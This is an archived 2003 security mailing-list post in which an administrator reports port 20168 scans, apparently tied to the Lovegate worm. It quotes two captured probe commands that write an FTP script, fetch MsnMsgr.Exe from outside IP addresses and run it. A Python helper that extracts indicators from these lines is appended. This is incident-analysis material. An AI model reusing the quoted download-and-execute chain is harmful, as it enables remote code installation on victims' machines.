New Worm or Worm Variant?
From: Charles Hamby (fixer_at_gci.net)
Date: 12/10/03
- Previous message: RODDY, Dan: "yahoo instant messenger profile"
- Next in thread: Harlan Carvey: "Re: New Worm or Worm Variant?"
- Reply: Harlan Carvey: "Re: New Worm or Worm Variant?"
- Maybe reply: Charles Hamby: "RE: New Worm or Worm Variant?"
- Maybe reply: Joris De Donder: "Re: New Worm or Worm Variant?"
- Maybe reply: Bassett, Mark: "FW: New Worm or Worm Variant?"
- Reply: Juri Haberland: "Re: New Worm or Worm Variant?"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 10 Dec 2003 10:36:23 -0900
To: incidents@securityfocus.com
I've been seeing a jump in 20168/tcp scans over the past week or so. This port is commonly associated with the Lovegate worm. I recently set up a port listener using Netcat to capture any output from probes against a couple of my systems. Shown below are the results:
echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe
echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe
At first glance it looks like some sort of non-interactive FTP session to download an exploit (MsnMsgr.Exe), but Googling for wxtu.dll came up empty (so this could be anything from a real .dll to a renamed executable in my mind). A couple of questions for the world at large:
1) Has anyone run across anything like this before? This looks like something automated to me. Worm script, perhaps. The IP I set up the port listener on had roughly 20+ probes on 20168/tcp from noon yesterday to 7am this morning.
2) Any theories on wxtu.dll? Since I can't get a hold of the malware to analyze it, I'm really guessing at this point. MsnMsgr.Exe seems to be the exploit itself, and it appears to be using something like FTPCOM to do a non-interactive FTP session, but wxtu.dll could be anything from a real .dll file to a renamed executable. Ideas?
-cdh
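A small triage helper, added here as an example and not part of the original post: it rebuilds the FTP script that the captured probe writes one `echo` at a time and pulls out the server, credentials, fetched file and launched program so they can be recorded as indicators. The regexes and function names are my own; the sample input is the two probe lines quoted above.

```python
import re

# Constructed input: the two probe payloads the Netcat listener captured,
# as quoted in the post above (IPs and file names are the page's own values).
CAPTURED_PROBES = [
    "echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe",
    "echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe",
]

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>\s*(\S+)$")   # echo <text> >> <file>
FTP_RE = re.compile(r"^ftp\b.*-s:(\S+)")                # ftp ... -s:<scriptfile>

def parse_probe(line):
    """Rebuild the FTP script that the chained 'echo ... >> file' commands
    write, then pull out server, credentials, fetched files and what is
    launched afterwards. Returns None if the line is not of this shape."""
    info = {"server": None, "user": None, "password": None,
            "script": None, "downloads": [], "launched": []}
    script_lines = []
    for cmd in (c.strip() for c in line.split("&")):
        if m := ECHO_RE.match(cmd):
            info["script"] = m.group(2)
            script_lines.append(m.group(1))
        elif m := FTP_RE.match(cmd):
            if m.group(1) != info["script"]:  # -s: must name the file just built
                return None
        elif cmd.startswith("start "):
            info["launched"].append(cmd.split(None, 1)[1])
    expect_password = False
    for text in script_lines:
        word = text.split() or [""]
        if expect_password:               # bare line after USER is the password
            info["password"], expect_password = text, False
        elif word[0].lower() == "open" and len(word) > 1:
            info["server"] = word[1]
        elif word[0].lower() == "user" and len(word) > 1:
            info["user"], expect_password = word[1], True
        elif word[0].lower() == "get" and len(word) > 1:
            info["downloads"].append(word[1])
    return info if info["server"] and info["downloads"] else None

def extract_iocs(lines):
    """Deduplicated FTP servers and fetched file names across all probes."""
    found = [p for p in map(parse_probe, lines) if p]
    servers = sorted({p["server"] for p in found})
    files = sorted({f for p in found for f in p["downloads"]})
    return servers, files
```

Run over a listener log, `extract_iocs` gives the distinct download hosts to block or watch for in outbound FTP logs; `parse_probe` returning None for a line is the signal that a probe has a different shape and needs a look by hand.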